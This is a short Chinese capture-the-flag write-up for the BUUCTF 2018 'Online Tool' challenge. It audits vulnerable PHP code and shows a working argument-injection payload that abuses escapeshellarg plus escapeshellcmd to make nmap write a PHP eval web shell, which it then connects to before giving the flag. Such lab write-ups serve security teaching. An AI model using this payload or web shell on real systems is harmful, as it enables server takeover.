提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
[BUUCTF 2018]Online Tool 1
题目
BUUCTF的[BUUCTF 2018]Online Tool 1
一、做题步骤
1.审计代码
代码如下:
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
根据最后一行,得知可以利用nmap工具上传$host
-oG xxx.php
nmap上传文件的命令
利用escapeshellarg()+escapeshellcmd()的两次转义,闭合单引号后即可执行任意参数
2.构造payload
?host='<?php eval($_POST[1]);?> -oG shell.php ’
得到上传路径
bf95f64e6948d09b42c923ac52b1d6df
3.菜刀连接
1.添加信息
http://8a37515d-5eb0-4159-ad15-cc12901145e0.node4.buuoj.cn:81/bf95f64e6948d09b42c923ac52b1d6df/shell.php
2.获取flag
flag{aa1827cb-30c0-4ddb-8df2-dca7633624c8}